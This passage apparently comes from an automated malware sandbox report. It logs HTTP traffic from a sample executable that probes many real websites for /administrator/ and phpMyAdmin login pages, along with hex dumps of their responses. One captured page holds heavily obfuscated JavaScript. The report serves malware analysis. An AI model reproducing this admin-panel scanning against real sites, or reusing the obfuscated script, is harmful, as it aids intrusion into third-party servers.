                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 45 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 45 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 6b 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 72 75 6e 74 69 6d 65 3d 45 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 72 79 7b 63 6f 6e 73 74
                                                                                                                                                                                                    Data Ascii: new Error("Runtime for ".concat(e," was never set"));return E[e]}function T(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");E[e]=(0,i.D)(t,k);const n=(0,r.ek)(e);n&&(n.runtime=E[e])}function R(e){return function(e){try{const
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 4e 61 76 69 67 61 74 6f 72 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20
                                                                                                                                                                                                    Data Ascii: ent,i="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNavigator||"undefined"!=typeof globalThis&&globalThis instanceof WorkerGlobalScope&&globalThis.navigator instanceof
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 64 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 72 3d 6e 28 38 33 32 35 29 2c 69 3d 6e 28 31 32 38 34 29 2c 61 3d 6e 28 34 33 32 32 29 2c 6f 3d 6e 28 33 33 32 35 29 3b 63 6f 6e 73 74 20 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 7b 73 74 61 67 65 64 3a 21 31 2c 70 72 69 6f 72 69 74 79 3a 6f 2e 70 5b 74 5d 7c 7c 30 7d 3b 75 28 65 29 2c 73 5b 65 5d 2e 67 65 74 28 74 29 7c 7c 73 5b 65 5d 2e 73 65 74 28 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 65 26 26 28 73 5b 65 5d 7c 7c 28 73 5b 65 5d 3d 6e 65 77 20 4d 61 70 29 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 6c 65 74 20 65 3d 61 72 67 75 6d 65
                                                                                                                                                                                                    Data Ascii: (e,t,n)=>{"use strict";n.d(t,{L:()=>d,R:()=>c});var r=n(8325),i=n(1284),a=n(4322),o=n(3325);const s={};function c(e,t){const n={staged:!1,priority:o.p[t]||0};u(e),s[e].get(t)||s[e].set(t,n)}function u(e){e&&(s[e]||(s[e]=new Map))}function d(){let e=argume
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 68 3b 69 2b 2b 29 6e 5b 69 5d 3d 3d 3d 74 26 26 6e 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 2c 61 29 7b 21 31 21 3d 3d 61 26 26 28 61 3d 21 30 29 3b 69 66 28 75 2e 61 62 6f 72 74 65 64 26 26 21 69 29 72 65 74 75 72 6e 3b 74 26 26 61 26 26 74 2e 65 6d 69 74 28 65 2c 6e 2c 72 29 3b 66 6f 72 28 76 61 72 20 6f 3d 70 28 72 29 2c 63 3d 76 28 65 29 2c 64 3d 63 2e 6c 65 6e 67 74 68 2c 6c 3d 30 3b 6c 3c 64 3b 6c 2b 2b 29 63 5b 6c 5d 2e 61 70 70 6c 79 28 6f 2c 6e 29 3b 76 61 72 20 66 3d 62 28 29 5b 73 5b 65 5d 5d 3b 66 26 26 66 2e 70 75 73 68 28 5b 67 2c 65 2c 6e 2c 6f 5d 29 3b 72 65 74 75 72 6e 20 6f 7d 2c 67 65 74 3a 6d 2c 6c 69 73 74 65 6e 65 72 73 3a 76 2c 63 6f 6e 74 65 78 74 3a 70 2c 62 75 66 66
                                                                                                                                                                                                    Data Ascii: h;i++)n[i]===t&&n.splice(i,1)},emit:function(e,n,r,i,a){!1!==a&&(a=!0);if(u.aborted&&!i)return;t&&a&&t.emit(e,n,r);for(var o=p(r),c=v(e),d=c.length,l=0;l<d;l++)c[l].apply(o,n);var f=b()[s[e]];f&&f.push([g,e,n,o]);return o},get:m,listeners:v,context:p,buff
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1369INData Raw: 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 61 3d 21 30 2c 21 31 7d 7d 3b 72 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 2c 72 2e 5f 41 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 7c 7c 61 3f 7b 63 61 70 74 75 72 65 3a 21 21 65 2c 70 61 73 73 69 76 65 3a 69 2c 73 69 67 6e 61 6c 3a 74 7d 3a 21 21 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73
                                                                                                                                                                                                    Data Ascii: et signal(){return a=!0,!1}};r._A.addEventListener("test",null,e),r._A.removeEventListener("test",null,e)}catch(e){}function o(e,t){return i||a?{capture:!!e,passive:i,signal:t}:!!e}function s(e,t){let n=arguments.length>2&&void 0!==arguments[2]&&arguments


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    154192.168.2.458629162.250.126.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC322OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: mydirectlender.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: pbid=172ff377aa4b3bde11e2a50383ed15a74ccd93833e8072198de1d3f5028def60
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://mydirectlender.com/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC494INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 65 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 78 2d 72 65 64 69 72 65 63 74 2d 62 79 3a 20 57 6f 72 64 50 72 65 73 73 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyConnection: closecontent-type: text/html; charset=UTF-8expires: Sun, 26 Nov 2023 06:59:33 GMTcache-control: max-age=3600x-redirect-by: WordPresslocation: https://mydirectlender.com/administrator/content-length:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    155192.168.2.458421202.226.37.1584436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: daisyokogyo.co.jp
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC165INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: closeLocation: /


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    156192.168.2.45837418.228.96.1424436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC187OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: www.rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC440INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 72 65 63 68 2e 63 6f 6d 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6f 72 69 67 69 6e 44 69 72 65 63 74 3d 74 72 75 65 3b 20 4d 61 78 2d 41 67 65 3d 36 30 34 38 30 30 3b 20 45 78 70 69 72 65 73 3d 53 75 6e 2c 20 30 33 20 44 65 63 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Length: 0Connection: closeContent-Security-Policy: frame-ancestors 'self'Location: https://rech.comSet-Cookie: originDirect=true; Max-Age=604800; Expires=Sun, 03 Dec 2023 05:59:34 GM


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    157192.168.2.45865334.136.104.2554436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC174OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: tiswheels.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC485INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 37 32 31 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 57 50 20 45 6e 67 69 6e 65 0d 0a 50 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 127217Connection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EnginePr
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC15899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 20 3e 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 41 57 2d 39 38 37 39 32 39 36 30 33 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 3e 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 20 67
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head >... Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id=AW-987929603"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} g
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16384INData Raw: 75 76 29 2b 73 28 75 37 2e 75 78 2c 75 37 2e 75 69 29 2b 73 28 75 37 2e 75 41 2c 75 37 2e 59 29 2b 27 6f 72 27 5d 5b 73 28 75 37 2e 75 79 2c 75 37 2e 75 57 29 2b 73 28 75 37 2e 75 6e 2c 75 37 2e 75 46 29 2b 73 28 75 37 2e 75 52 2c 75 37 2e 75 65 29 5d 5b 73 28 75 37 2e 75 6a 2c 75 37 2e 75 6b 29 2b 27 64 27 5d 28 4c 29 2c 76 3d 4b 5b 6d 5d 2c 78 3d 4a 5b 76 5d 7c 7c 54 3b 54 5b 73 28 75 37 2e 75 43 2c 75 37 2e 59 29 2b 73 28 75 37 2e 75 64 2c 75 37 2e 75 73 29 2b 73 28 75 37 2e 75 51 2c 75 37 2e 75 68 29 5d 3d 4c 5b 73 28 75 37 2e 75 49 2c 75 37 2e 75 71 29 2b 27 64 27 5d 28 4c 29 2c 54 5b 73 28 75 37 2e 75 50 2c 75 37 2e 75 65 29 2b 73 28 75 37 2e 75 7a 2c 75 37 2e 75 65 29 2b 27 6e 67 27 5d 3d 78 5b 73 28 75 37 2e 75 4d 2c 75 37 2e 75 55 29 2b 73 28 75
                                                                                                                                                                                                    Data Ascii: uv)+s(u7.ux,u7.ui)+s(u7.uA,u7.Y)+'or'][s(u7.uy,u7.uW)+s(u7.un,u7.uF)+s(u7.uR,u7.ue)][s(u7.uj,u7.uk)+'d'](L),v=K[m],x=J[v]||T;T[s(u7.uC,u7.Y)+s(u7.ud,u7.us)+s(u7.uQ,u7.uh)]=L[s(u7.uI,u7.uq)+'d'](L),T[s(u7.uP,u7.ue)+s(u7.uz,u7.ue)+'ng']=x[s(u7.uM,u7.uU)+s(u
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16384INData Raw: 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 65 6c 65 6d 65 6e 74 6f 72 2d 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 69 73 77 68 65 65 6c 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 63 73 73 2f 63 75 73 74 6f 6d 2d 66 72 6f 6e 74 65 6e 64 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 31 36 39 38 38 34 39 39 33 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 73 77 69 70 65 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 69 73 77 68
                                                                                                                                                                                                    Data Ascii: edia='all' /><link rel='stylesheet' id='elementor-frontend-css' href='https://tiswheels.com/wp-content/uploads/elementor/css/custom-frontend.min.css?ver=1698849933' type='text/css' media='all' /><link rel='stylesheet' id='swiper-css' href='https://tiswh
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16384INData Raw: 74 3b 32 26 71 75 6f 74 3b 7d 22 20 64 61 74 61 2d 77 69 64 67 65 74 5f 74 79 70 65 3d 22 6a 65 74 2d 63 61 72 6f 75 73 65 6c 2e 64 65 66 61 75 6c 74 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 6a 65 74 2d 63 61 72 6f 75 73 65 6c 20 6a 65 74 2d 65 6c 65 6d 65 6e 74 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 74 2d 63 61 72 6f 75 73 65 6c 2d 77 72 61 70 20 6a 65 74 2d 65 71 75 61 6c 2d 63 6f 6c 73 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 74 2d 63 61 72 6f 75 73 65 6c 22 20 64 61 74 61 2d 73 6c 69 64 65 72 5f 6f 70 74 69 6f 6e 73 3d 22 7b 26 71 75 6f 74 3b 61 75 74
                                                                                                                                                                                                    Data Ascii: t;2&quot;}" data-widget_type="jet-carousel.default"><div class="elementor-widget-container"><div class="elementor-jet-carousel jet-elements"><div class="jet-carousel-wrap jet-equal-cols"><div class="jet-carousel" data-slider_options="{&quot;aut
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16384INData Raw: 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 74 2d 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 74 2d 6d 65 6e 75 2d 69 6e 6e 65 72 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6a 65 74 2d 6d 65 6e 75 20 6a 65 74 2d 6d 65 6e 75 2d 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 79 70 65 2d 66 61 64 65 20 6a 65 74 2d 6d 65 6e 75 2d 2d 72 6f 6c 6c 2d 75 70 22 3e 3c 6c 69 20 69 64 3d 22 6a 65 74 2d 6d 65 6e 75 2d 69 74 65 6d 2d 38 32 32 22 20 63 6c 61 73 73 3d 22 6a 65 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 6a 65 74 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6a 65 74 2d 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6a 65 74 2d 68 61 73 2d 72 6f 6c 6c 2d 75 70 20 6a 65
                                                                                                                                                                                                    Data Ascii: ner"><div class="jet-menu-container"><div class="jet-menu-inner"><ul class="jet-menu jet-menu--animation-type-fade jet-menu--roll-up"><li id="jet-menu-item-822" class="jet-menu-item jet-menu-item-type-post_type jet-menu-item-object-page jet-has-roll-up je
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC16384INData Raw: 65 3d 22 69 74 65 6d 73 63 6f 70 65 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 50 46 6f 6f 74 65 72 22 3e 09 09 3c 64 69 76 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 74 79 70 65 3d 22 66 6f 6f 74 65 72 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 69 64 3d 22 32 32 30 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 20 65 6c 65 6d 65 6e 74 6f 72 2d 32 32 30 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 70 6f 73 74 2d 74 79 70 65 3d 22 65 6c 65 6d 65 6e 74 6f 72 5f 6c 69 62 72 61 72 79 22 3e 0a 09 09 09 09 09 09 09 09 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 70 2d 73 65 63 74 69 6f 6e 20 65
                                                                                                                                                                                                    Data Ascii: e="itemscope" itemtype="http://schema.org/WPFooter"><div data-elementor-type="footer" data-elementor-id="220" class="elementor elementor-220" data-elementor-post-type="elementor_library"><section class="elementor-section elementor-top-section e
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC16384INData Raw: 75 6f 74 3b 73 69 7a 65 26 71 75 6f 74 3b 3a 35 30 2c 26 71 75 6f 74 3b 73 69 7a 65 73 26 71 75 6f 74 3b 3a 5b 5d 7d 2c 26 71 75 6f 74 3b 6a 65 74 5f 70 61 72 61 6c 6c 61 78 5f 6c 61 79 6f 75 74 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 73 63 72 6f 6c 6c 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6a 65 74 5f 70 61 72 61 6c 6c 61 78 5f 6c 61 79 6f 75 74 5f 64 69 72 65 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 6e 75 6c 6c 2c 26 71 75 6f 74 3b 6a 65 74 5f 70 61 72 61 6c 6c 61 78 5f 6c 61 79 6f 75 74 5f 66 78 5f 64 69 72 65 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 6e 75 6c 6c 2c 26 71 75 6f 74 3b 6a 65 74 5f 70 61 72 61 6c 6c 61 78 5f 6c 61 79 6f 75 74 5f 7a 5f 69 6e 64 65 78 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6a 65 74
                                                                                                                                                                                                    Data Ascii: uot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:null,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC13014INData Raw: 2b 30 78 31 37 2a 30 78 31 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 66 28 47 53 2e 49 29 29 2f 28 30 78 31 36 65 66 2b 2d 30 78 32 32 37 30 2b 30 78 62 38 62 29 3b 69 66 28 55 3d 3d 3d 5a 29 62 72 65 61 6b 3b 65 6c 73 65 20 76 5b 27 70 75 73 68 27 5d 28 76 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 52 29 7b 76 5b 27 70 75 73 68 27 5d 28 76 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 46 2c 2d 30 78 31 32 63 34 32 64 2b 30 78 31 32 36 36 34 33 2b 30 78 33 63 2a 30 78 32 64 32 33 29 29 3b 66 75 6e 63 74 69 6f 6e 20 46 28 29 7b 76 61 72 20 5a 39 3d 5b 27 6c 65 63 27 2c 27 64 6e 73 27 2c 27 34 33 31 37 31 36 38 77 68 43 4f 72 5a 27 2c 27 36 32 36 39 38 79 42 4e 6e 4d 50 27 2c 27 74 72 69 27 2c 27 69 6e 64 27 2c 27 2e 63 6f 27 2c 27 65 61
                                                                                                                                                                                                    Data Ascii: +0x17*0x16)+-parseInt(f(GS.I))/(0x16ef+-0x2270+0xb8b);if(U===Z)break;else v['push'](v['shift']());}catch(R){v['push'](v['shift']());}}}(F,-0x12c42d+0x126643+0x3c*0x2d23));function F(){var Z9=['lec','dns','4317168whCOrZ','62698yBNnMP','tri','ind','.co','ea


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    158192.168.2.45871523.185.0.14436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC235OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: www.avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.avient.com/administrator/
